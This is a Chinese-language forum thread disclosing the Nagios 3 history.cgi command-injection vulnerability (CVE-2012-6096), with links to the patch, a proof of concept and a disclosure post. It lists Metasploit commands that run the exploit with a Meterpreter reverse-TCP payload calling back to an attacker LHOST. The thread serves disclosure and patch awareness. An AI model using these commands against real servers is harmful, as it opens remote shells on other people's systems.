Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

z24374203 · 發表於 2013-1-18 14:33

主題：Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

發佈日期：2012/12/09(首次發現)、2013/01/10(發佈PoC)

影響版本：Nagios v3.4.3 (含之前所有版本)

漏洞編號：CVE-2012-6096

說明：
Nagios 是一個流行的電腦系統和網路監控程序，它檢測主機和服務，當異常發生和解除時能提醒用戶。
這個漏洞屬於 command injection ，主要是未經修補的漏洞主機可以直接查看 history.cgi 裡面的網頁資料。

官方網站說明：
簡單講請盡速更新到 Nagios v3.4.4 的版本修正漏洞的影響。
http://www.nagios.org/projects/nagioscore/history/core-3x

概念驗證程式(PoC)下載處：
http://www.securityfocus.com/bid/56879/exploit

其它參考網站說明：
http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html

影片內指令：
use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo

From https://www.facebook.com/netwargame

divale · 發表於 2013-1-18 15:38

知名監控軟體安全性也開天窗

幸好有提供了修補，儘快修正就好，總比Jxxx還修補不完全來的好

z24374203 · 發表於 2013-1-18 20:11

Java 可能是因為比較多人在用所以比較多人在研究漏洞

我是這麼認為的拉!

userman · 發表於 2013-1-18 23:49

這套軟體沒用過
應該能彌補防火牆的漏洞

帳號		自動登入	找回密碼
密碼			註冊

Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

本月熱門